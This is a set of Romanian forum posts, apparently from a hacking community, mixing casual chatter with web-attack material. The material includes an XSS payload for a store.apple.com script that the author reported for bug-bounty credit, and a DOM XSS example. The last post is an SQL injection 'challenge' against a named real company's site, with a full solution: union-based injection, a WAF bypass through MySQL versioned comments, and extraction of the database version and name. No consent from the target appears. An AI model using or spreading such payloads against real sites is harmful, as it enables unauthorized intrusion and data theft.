dancezar

Am raportat un xss in domeniul store.apple.com prin aprilie asa nu imi mai amintesc sigur si abea acum 1 ora am primit raspun ca m-au adaugat in HOF. Scriptul vurnerabil era acesta var addSBTag = /(iPhone|iPod).*OS.*AppleWebKit.*Mobile.*Safari/.test(navigator.userAgent); if (addSBTag) { var headNode = document.getElementsByTagName("head")[0]; var sbNode = document.createElement('meta'); sbNode.name = 'apple-itunes-app'; sbNode.content = 'app-id=375380948, app-argument=http:\/\/store.apple.com\/us\/ipod\/ipod-accessories\/apple-tv?test123'; headNode.appendChild(sbNode); } iar locul vurn era unde apare acolo test123 iar daca bagai la orice pagina din subdomeniu asta, urmatorul vector :';}else if(1==1){alert(1)}// sarea alertu pe toate browserele inafara de firefox si IE Parca l-am postat si pe rst tot atunci. Apple Web Server notifications

Banuiesc daca e aplicatia lor play posibil sa primesti ceva.De ce nu ii intrebi pe ei?

felicitari:) sper sa primesti recompensa cuvenita;) Ca si o mica paranteza ce ai acolo jos nu este o eroare posibil ca acei parametri sa fie iesiti din tagul script si sa fie afisati in pagina gj:)

Sorry i write wrong.I wanted to write "without":)))

I done all taks except the part without the HTML table tags(/*!edit here*/) Nice challenge!

Fara Box de ala de la service nu poti sa iti schimbi IMEI

Nu este roman de asta scrie in engleza

cauti si tu acuma xss nu?

Sa il folosesti sanatos:) Cat ai dat pe el?

Multumesc mult pentru challenge.Initial am crezut ca e foarte usor dar nu prea a fost:))Chiar am invatat ceva:) Imediat vin cu un edit sa las un screenshot //Gata http://s23.postimg.org/cue9sdxt7/rsz_screenshot_3.png

off: Ba se supara:| Si daca imi trimite acuma unu PM si imi zice ca a vrut sa faca challengeul da n-a avut loc de tine:)). Oricum am postat si un "tutorial" cum am rezolvat eu. Alta data intreaba inainte sa postezi:). ON : Felicitari tuturor va astept la urmatorul challenge.

Daca cineva ia o poza unei victime si o printeaza pe o foaie A4?Sistemul v-a recunoaste persoana din poza prin urmare nu este sigur pe orice parte ai da.Tot pinul este mai sigur. Apropo cand vei merge la magazin sa cumperi ceva cu cardu oare se aplica principul plateste dupa cum tie fata?

Bonus:

Hello, thank you very much for your report to the Avast Bug Bounty Program. Unfortunately your submission isn't eligible. We are accepting only reports about the avast! Antivirus product ("The program is currently limited to consumer Windows versions of Avast (i.e.: Avast Free Antivirus, Avast Pro Antivirus, and Avast Internet Security"). Your submission is about our web site which isn't part of this program. We appreciate your feedback. And we are looking for your next reports which will be about avast! for Windows. Best regards Lukas Hasik Quality Assurance Director AVAST Software a.s. asta e ultimul mesaj primit de la ei :|poate tu o sa ai mai mult noroc //Plus ca l-au reparat

Nice...dar din pacate am raportat si eu unu si nu mi-au dat nici o licenta doar un multumesc ,se pare ca au bugbounty doar pentru produsele antivirus

Bravo akkiliON se pare ca vei aparea cu mine si vadsunete pe HOF luna viitoare Security Researcher Acknowledgments - Microsoft Online Services | TechNet

Am sa postez:)

Inainte puneam pozele pe imageshack si nu imi aprarea 404 dar daca incerc sa pun imaginea pe postimage si sa bag calea directa catre poza jpg imi apare 404 chiar daca ea defapt exista ,cred ca depinde unde urci imaginea.

Mai adaug si eu ceva.Mai este si acesta un tip de DOOM XSS acesta este scriptul vurnerabil <script> document.write(document.location.hash); </script> site.com/script_vurnerabil.html#<script>alert(1)</script>

Foarte frumos dar nu este locul unde am indicat,credema este mult mai greu unde am indicat eu;)

Astept sintaxa CORECTA pe pm

Normal ca union , nu am specificat pentru se intelege de la sine,mai merge si blind sau timebased ceea ce se face cu un tool iar rezultatul nu ar fi ca in poza mea.Daca te referi la error based nu merge pt ca erroarea iti spune ca mysql_fetch_array nu a returnat rezultate dar nu iti arata eroarea aia You have a sintax error balaalabalba,ar fi fost prea simplu. Mai incerca;)

Target:Cepco Management Dificulty:Mediu Proof: View image: prooff Cerinte: -Scoateti versiunea si numele bazei de date impreuna cu nick-ul vostru pe o singura coloana -Faceti o poza cenzurata si o postati aici -Trimiteti sintaxa prin PM -Nu dati hinturi Solvers: -Hannibal -electrotech93 -Renegade -qwerty12 (muie ba) //Challenge Closed Rezolvarea este in felul urmator: -Pentru a numara coloanele folosim ') order by 1+--+ Din cate imi amintesc erau 35 de coloane Apoi daca incercam sa facem union:') union select 1,2,3,4,5,6,7......35+--+ Primeam 403 Forbiten Union este filtrat astfel vom aplica metoda cu comentarii pentru a trece de WAF /*!50000UnIoN*/ ') /*!50000UnIoN*/ Select 1,2,3,4,5,6,7,....35+--+ Mai ramanea sa faceti concat sa scoateti versiune db si nick.Daca incercam sa facem concat() vom primi 403 puteti folosi acelasi metoda ca mai sus cu comentarii sau mai simplu si elegant cu concat_ws(0x3a,version(),database()) Felicitari tuturor!! Va astept si la urmatorul challenge